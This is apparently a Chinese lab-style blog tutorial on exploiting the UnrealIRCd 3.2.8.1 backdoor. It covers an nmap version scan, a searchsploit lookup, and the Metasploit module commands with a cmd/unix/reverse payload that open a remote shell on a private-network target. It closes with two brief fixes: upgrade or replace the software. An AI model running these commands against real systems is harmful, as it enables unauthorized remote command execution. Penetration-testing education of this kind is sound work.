当前位置:网站首页>6-25漏洞利用-irc后门利用
6-25漏洞利用-irc后门利用
2022-08-02 00:44:00 【山兔1】
irc介绍
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称),用来区分不同用户。
默认情况下,irc服务器运行在6667端口。
探测目标irc
使用nmap -sV -p 6667 IP地址 探测目标irc版本信息
nmap -sV -p 6667 192.168.42.137
可以看到,很快探测出目标版本信息
msf利用irc后门
使用searchsploit查找可以利用的POC
searchsploit UnrealIRCd
可以查看到,当前软件是否存在问题,我们在这里选择Backdoor Command Execution(Metasploit),进行利用
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit
利用msf中对于irc后门连接的模块,连接shell。
可以看到,探测完成,建立了session,我们可以在这里执行任意命令
修复防御
1、升级软件版本
2、更换其他软件
边栏推荐
- Oracle data to mysql FlinkSQL CDC to achieve synchronization
- 管理基础知识10
- MLX90640 红外热成像仪测温模块开发笔记(完整版)
- Flink_CDC construction and simple use
- ELK日志分析系统
- 理解分布式系统中的缓存架构(下)
- Redis 相关问题
- Go语学习笔记 - gorm使用 - gorm处理错误 Web框架Gin(十)
- 【目标检测】FCOS: Fully Convolutional One-Stage Object Detection
- Microsoft PC Manager V2.1 beta version officially released
猜你喜欢
随机推荐
管理基础知识18
CVPR 2022 | SharpContour:一种基于轮廓变形 实现高效准确实例分割的边缘细化方法
Debian侵犯Rust商标,妥协改名还是会得到豁免?
swing的Jlist列表滚动条以及增加元素的问题
datax与datax-web安装部署
Mapped Statements collection does not contain value for的解决方法
好的期货公司开户让人省心省钱
ERROR 2003 (HY000) Can‘t connect to MySQL server on ‘localhost3306‘ (10061)
C语言实验十 函数(二)
Flask gets post request parameters
Realize deletion - a specified letter in a string, such as: the string "abcd", delete the "a" letter in it, the remaining "bcd", you can also pass multiple characters to be deleted, and pass "ab" can
百度、百图生科 | HelixFold-Single: 使用蛋白质语言模型作为替代进行无MSA蛋白质结构预测
Kubernetes — Flannel
ELK日志分析系统
C语言函数详解(1)【库函数与自定义函数】
C语言实现扫雷游戏
Can‘t connect to MySQL server on ‘localhost3306‘ (10061) 简洁明了的解决方法
flyway的快速入门教程
23.卷积神经网络实战-ResNet
H5画布 canvas(一)canvas简介、绘制圆形矩形、案例饼状图绘制